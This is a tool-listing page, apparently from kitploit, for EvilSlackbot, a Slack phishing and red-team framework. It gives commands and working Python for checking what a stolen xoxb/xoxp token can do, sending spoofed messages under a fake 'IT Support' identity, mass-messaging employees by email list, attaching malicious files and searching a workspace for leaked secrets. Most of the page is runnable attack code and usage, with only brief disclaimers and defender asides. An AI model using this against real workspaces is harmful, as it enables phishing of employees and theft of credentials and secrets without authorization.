EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

2024-06-02 12:30:00
www.kitploit.com
Tags: red team, phishing, slack, framework, security, permissions, oauth token, python3, slackclient, spoof, messages, files, search, secrets, emails, installation, usage


EvilSlackbot

A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

Disclaimer

This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.

Background

Thousands of organizations use Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that automate tasks within Slack. Each bot is granted its own set of permissions (OAuth scopes) that dictate which requests it may make to the Slack API. To authenticate to the Slack API, each app is issued an API token that begins with xoxb (a bot token, acting as the bot user) or xoxp (a user token, acting as the installing user). These tokens are frequently leaked, for example committed to source repositories or hard-coded in scripts. When such a token is recovered during a Red Team exercise, it can be a pain to make proper use of it. EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.

Phishing Simulations

In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, create a bot within Slack, grant it the permissions required for your intended test, and provide EvilSlackbot with a list of email addresses of the employees you want to test with simulated phishes (links, files, spoofed messages).

Installation

EvilSlackbot requires python3 and the slackclient package. Note that slackclient is the legacy name of Slack's Python SDK (its successor is published as slack_sdk); install it under the name below so the tool's imports resolve:

pip3 install slackclient  

Usage

usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]  
                       [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]  
  
options:  
  -h, --help            show this help message and exit  
  
Required:  
  -t TOKEN, --token TOKEN  
                        Slack Oauth token  
  
Attacks:  
  -sP, --spoof          Spoof a Slack message, customizing your name, icon, etc  
                        (Requires -e,-eL, or -cH)  
  -m, --message         Send a message as the bot associated with your token  
                        (Requires -e,-eL, or -cH)  
  -s, --search          Search slack for secrets with a keyword  
  -a, --attach          Send a message containing a malicious attachment (Requires -f  
                        and -e,-eL, or -cH)  
  
Arguments:  
  -f FILE, --file FILE  Path to file attachment  
  -e EMAIL, --email EMAIL  
                        Email of target  
  -cH CHANNEL, --channel CHANNEL  
                        Target Slack Channel (Do not include #)  
  -eL EMAIL_LIST, --email_list EMAIL_LIST  
                        Path to list of emails separated by newline  
  -c, --check           Lookup and display the permissions and available attacks  
                        associated with your provided token.  
  -o OUTFILE, --outfile OUTFILE  
                        Outfile to store search results  
  -cL, --channel_list   List all public Slack channels  

Token

To use this tool, you must provide a xoxb or xoxp token.

Required:  
  -t TOKEN, --token TOKEN  (Slack xoxb/xoxp token)  



python3 EvilSlackbot.py -t <token>  

Attacks

Depending on the permissions (OAuth scopes) associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot automatically checks what permissions your token has and displays them together with every attack you are able to perform with that token; -c runs this check on its own without launching an attack.

Attacks:  
  -sP, --spoof   Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)  
  
  -m, --message  Send a message as the bot associated with your token (Requires -e,-eL, or -cH)  
  
  -s, --search   Search slack for secrets with a keyword   
  
  -a, --attach   Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)  
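The permission check that gates the attacks above, as an added example that is not EvilSlackbot's own code: Slack reports a token's granted scopes in the X-OAuth-Scopes response header of any Web API call, so a single auth.test request is enough to learn what a recovered xoxb/xoxp token can do. The scope names are Slack's; tying them to the tool's flags, the fetch_scopes function and its injectable opener are this example's own assumptions.

```python
import json
import sys
import urllib.request

# Which Slack scopes each EvilSlackbot attack needs. The scope names are Slack's;
# mapping them to the tool's flags is this example's own assumption.
ATTACK_SCOPES = {
    "message":      {"chat:write"},                          # -m
    "spoof":        {"chat:write", "chat:write.customize"},  # -sP
    "attach":       {"files:write"},                         # -a
    "search":       {"search:read"},                         # -s  (user tokens only)
    "channel_list": {"channels:read"},                       # -cL
}


def token_kind(token):
    """Classify the token by its documented prefix."""
    if token.startswith("xoxb-"):
        return "bot"
    if token.startswith("xoxp-"):
        return "user"
    raise ValueError("expected a token starting with xoxb- or xoxp-")


def parse_scopes(header_value):
    """Turn an X-OAuth-Scopes value such as 'chat:write, users:read' into a set."""
    return {s.strip() for s in header_value.split(",") if s.strip()}


def available_attacks(scopes):
    """Attacks whose required scopes are all present in the token's scope set."""
    return sorted(name for name, needed in ATTACK_SCOPES.items() if needed <= scopes)


def fetch_scopes(token, opener=urllib.request.urlopen):
    """POST auth.test with the token and read the scopes from the response header.

    The opener is injectable so the call can be faked in tests; by default it
    really talks to slack.com.
    """
    req = urllib.request.Request(
        "https://slack.com/api/auth.test",
        data=b"",
        headers={"Authorization": "Bearer " + token},
        method="POST",
    )
    with opener(req) as resp:
        body = json.loads(resp.read())
        if not body.get("ok"):
            raise RuntimeError("auth.test failed: " + str(body.get("error")))
        # http.client header lookup is case-insensitive
        return parse_scopes(resp.headers.get("X-OAuth-Scopes", ""))


if __name__ == "__main__":
    tok = sys.argv[1]
    print("token kind:", token_kind(tok))
    granted = fetch_scopes(tok)
    print("scopes:", ", ".join(sorted(granted)))
    print("attacks:", ", ".join(available_attacks(granted)) or "none")
```

Run it as `python3 check_scopes.py xoxb-...` (hypothetical file name). A defender can use the same header to audit what an app installed in their workspace is actually allowed to do.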

Spoofed messages (-sP)

With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the bot name and bot photo (overriding the sender's display name and icon requires the chat:write.customize scope in addition to chat:write). This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot uses these arguments to look up the Slack ID of the user associated with each email, or of the named channel. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>  
  
python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>  
  
python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>  

Phishing Messages (-m)

With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the spoofed attack is that the message is sent as the bot associated with your provided token: you cannot choose the name or image of the bot sending your phish, so only chat:write is needed. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot uses these arguments to look up the Slack ID of the user associated with each email, or of the named channel. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>  
  
python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>  
  
python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>  

Secret Search (-s)

With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token: message search (search:read) is a user-token scope that cannot be granted to a bot (xoxb) token. Use the -o argument to write the search results to an outfile.

python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>  
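What a keyword search for secrets looks like under the hood, as an added example that is not EvilSlackbot's own code: page through search.messages and run a handful of secret patterns over every matching message. The Slack token regexes follow the documented xoxb-/xoxp- prefixes; the other patterns, the slack_api wrapper, and the canned SAMPLE_PAGES (constructed so the block runs offline without a token) are this example's own assumptions.

```python
import json
import re
import urllib.parse
import urllib.request

# Approximate shapes of common secrets. The two Slack patterns follow Slack's
# documented xoxb-/xoxp- prefixes; the rest are illustrative, not exhaustive.
SECRET_PATTERNS = {
    "slack_bot_token":     re.compile(r"\bxoxb-[0-9]+-[0-9]+-[A-Za-z0-9]+"),
    "slack_user_token":    re.compile(r"\bxoxp-[0-9]+-[0-9]+-[0-9]+-[a-f0-9]+"),
    "aws_access_key_id":   re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block":   re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*\S+"),
}


def slack_api(token, opener=urllib.request.urlopen):
    """api_call(method, **params) bound to a real token: form-encoded POST to slack.com."""
    def api_call(method, **params):
        data = urllib.parse.urlencode(params).encode()
        req = urllib.request.Request("https://slack.com/api/" + method, data=data,
                                     headers={"Authorization": "Bearer " + token}, method="POST")
        with opener(req) as resp:
            return json.loads(resp.read())
    return api_call


def search_messages(api_call, query, count=100):
    """Yield every match of search.messages, following its page/pages paging (needs an xoxp token)."""
    page = 1
    while True:
        resp = api_call("search.messages", query=query, count=count, page=page)
        if not resp.get("ok"):
            raise RuntimeError("search.messages failed: " + str(resp.get("error")))
        msgs = resp["messages"]
        for m in msgs.get("matches", []):
            yield m
        if page >= msgs.get("paging", {}).get("pages", 1):
            return
        page += 1


def find_secrets(api_call, keyword):
    """Search for keyword, then run every secret pattern over each hit's text."""
    hits = []
    for m in search_messages(api_call, keyword):
        text = m.get("text", "")
        for kind, pattern in SECRET_PATTERNS.items():
            for match in pattern.finditer(text):
                hits.append({
                    "kind": kind,
                    "secret": match.group(0),
                    "channel": m.get("channel", {}).get("name"),
                    "permalink": m.get("permalink"),
                })
    return hits


# --- constructed, offline stand-in for the Slack API so the block runs without a token ---
SAMPLE_PAGES = [
    [{"text": "prod db password: hunter2", "channel": {"name": "devops"},
      "permalink": "https://example.slack.com/archives/C1/p1"},
     {"text": "meeting moved to 3pm", "channel": {"name": "general"},
      "permalink": "https://example.slack.com/archives/C2/p2"}],
    [{"text": "ci bot uses xoxb-1234567890-1234567890-AbCdEfGhIjKlMnOpQrStUvWx",
      "channel": {"name": "devops"}, "permalink": "https://example.slack.com/archives/C1/p3"},
     {"text": "aws key AKIAIOSFODNN7EXAMPLE please rotate", "channel": {"name": "infra"},
      "permalink": "https://example.slack.com/archives/C3/p4"}],
]


def fake_slack_api(pages=SAMPLE_PAGES):
    """Return an api_call that serves the canned search.messages pages above."""
    def api_call(method, **params):
        if method != "search.messages":
            return {"ok": False, "error": "unknown_method"}
        idx = params.get("page", 1) - 1
        return {"ok": True, "messages": {"matches": pages[idx],
                                         "paging": {"page": idx + 1, "pages": len(pages)}}}
    return api_call


if __name__ == "__main__":
    # Swap fake_slack_api() for slack_api("xoxp-...") to search a real workspace.
    for hit in find_secrets(fake_slack_api(), "password"):
        print(hit["kind"], hit["channel"], hit["permalink"], hit["secret"])
```

Keyword search only returns messages that contain the keyword, so a real sweep runs several queries ("password", "token", "AKIA", "BEGIN PRIVATE KEY") and deduplicates on permalink. The same pattern set, run over a workspace export, is how a defender finds the tokens this tool would later abuse.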

Attachments (-a)

With the correct token permissions (files:write), EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot uses these arguments to look up the Slack ID of the user associated with each email, or of the named channel. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>  
  
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>  
  
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>  

Arguments

Arguments:  
  -f FILE, --file FILE  Path to file attachment  
  -e EMAIL, --email EMAIL  Email of target  
  -cH CHANNEL, --channel CHANNEL  Target Slack Channel (Do not include #)  
  -eL EMAIL_LIST, --email_list EMAIL_LIST  Path to list of emails separated by newline  
  -c, --check   Lookup and display the permissions and available attacks associated with your provided token.  
  -o OUTFILE, --outfile OUTFILE Outfile to store search results  
  -cL, --channel_list   List all public Slack channels  

Channel Search

With the correct permissions (channels:read), EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages; the names it prints are what -cH expects, without the leading #. Use -o to write the list to an outfile.

python3 EvilSlackbot.py -t <xoxb token> -cL  
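The target resolution and delivery flow shared by the spoof (-sP), message (-m), email-list (-eL) and channel (-cH / -cL) options, as an added example that is not EvilSlackbot's own code: an email becomes a user ID (users.lookupByEmail, users:read.email), the user ID becomes a DM channel (conversations.open, im:write), a channel name is matched against conversations.list (channels:read) with cursor pagination, and chat.postMessage (chat:write, plus chat:write.customize when username/icon_emoji are set) delivers the text. The Slack method and scope names are real; the function names, the slackclient_api wrapper (which assumes the slackclient 2.x WebClient API) and the FakeSlack stand-in (constructed so the block runs offline) are this example's own assumptions.

```python
def slackclient_api(token):
    """Bind api_call to the real Web API via the slackclient package (2.x API assumed)."""
    from slack import WebClient  # imported lazily so the offline demo needs no install
    client = WebClient(token=token)

    def api_call(method, **params):
        # WebClient raises SlackApiError itself when Slack answers ok=false.
        return client.api_call(method, json=params).data
    return api_call


def resolve_user_dm(api_call, email):
    """Email -> user ID (users:read.email) -> DM channel ID (im:write)."""
    user = api_call("users.lookupByEmail", email=email)
    if not user.get("ok"):
        raise LookupError("%s: %s" % (email, user.get("error")))
    dm = api_call("conversations.open", users=user["user"]["id"])
    if not dm.get("ok"):
        raise RuntimeError("conversations.open failed: " + str(dm.get("error")))
    return dm["channel"]["id"]


def list_public_channels(api_call):
    """All public channels (channels:read), following cursor pagination; what -cL prints."""
    channels, cursor = [], ""
    while True:
        params = {"types": "public_channel", "exclude_archived": "true", "limit": 200}
        if cursor:
            params["cursor"] = cursor
        resp = api_call("conversations.list", **params)
        if not resp.get("ok"):
            raise RuntimeError("conversations.list failed: " + str(resp.get("error")))
        channels.extend(resp["channels"])
        cursor = resp.get("response_metadata", {}).get("next_cursor", "")
        if not cursor:
            return channels


def resolve_channel(api_call, name):
    """Channel name (with or without '#') -> channel ID."""
    name = name.lstrip("#")
    for ch in list_public_channels(api_call):
        if ch["name"] == name:
            return ch["id"]
    raise LookupError("no public channel named " + name)


def send_phish(api_call, target, text, spoof=None):
    """Post text to one target: an email address (DM) or a channel name.

    spoof, if given, is e.g. {"username": "IT Support", "icon_emoji": ":lock:"}
    and needs chat:write.customize; without it the message shows the bot's own identity.
    """
    channel = resolve_user_dm(api_call, target) if "@" in target else resolve_channel(api_call, target)
    params = {"channel": channel, "text": text}
    if spoof:
        params.update(spoof)
    resp = api_call("chat.postMessage", **params)
    if not resp.get("ok"):
        raise RuntimeError("chat.postMessage failed: " + str(resp.get("error")))
    return {"channel": channel, "ts": resp["ts"]}


def send_to_list(api_call, emails, text, spoof=None):
    """-eL behaviour: one DM per address, recording failures instead of aborting the run."""
    results = {}
    for email in emails:
        try:
            results[email] = send_phish(api_call, email, text, spoof)
        except (LookupError, RuntimeError) as exc:
            results[email] = {"error": str(exc)}
    return results


class FakeSlack:
    """Constructed stand-in for the Web API: canned users and channels, records every call."""
    def __init__(self):
        self.calls = []
        self.users = {"alice@example.com": "U0001"}
        self.pages = [[{"id": "C0001", "name": "general"}], [{"id": "C0002", "name": "devops"}]]

    def __call__(self, method, **params):
        self.calls.append((method, params))
        if method == "users.lookupByEmail":
            uid = self.users.get(params["email"])
            return {"ok": True, "user": {"id": uid}} if uid else {"ok": False, "error": "users_not_found"}
        if method == "conversations.open":
            return {"ok": True, "channel": {"id": "D" + params["users"][1:]}}
        if method == "conversations.list":
            page = 1 if params.get("cursor") else 0
            nxt = "" if page == len(self.pages) - 1 else "cursor-%d" % (page + 1)
            return {"ok": True, "channels": self.pages[page], "response_metadata": {"next_cursor": nxt}}
        if method == "chat.postMessage":
            return {"ok": True, "channel": params["channel"], "ts": "1717329000.000100"}
        return {"ok": False, "error": "unknown_method"}


if __name__ == "__main__":
    api = FakeSlack()  # replace with slackclient_api("xoxb-...") for a real workspace
    print(send_phish(api, "alice@example.com", "Please re-authenticate: https://example.invalid/login",
                     spoof={"username": "IT Support", "icon_emoji": ":lock:"}))
    print([c["name"] for c in list_public_channels(api)])
```

A failed users.lookupByEmail (users_not_found, or missing_scope when users:read.email was not granted) is the most common reason a list run delivers nothing, which is why send_to_list keeps the per-address error instead of stopping. The recorded calls in FakeSlack are also the exact sequence a defender should expect to see in Slack's audit logs for this kind of activity.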

Download EvilSlackbot
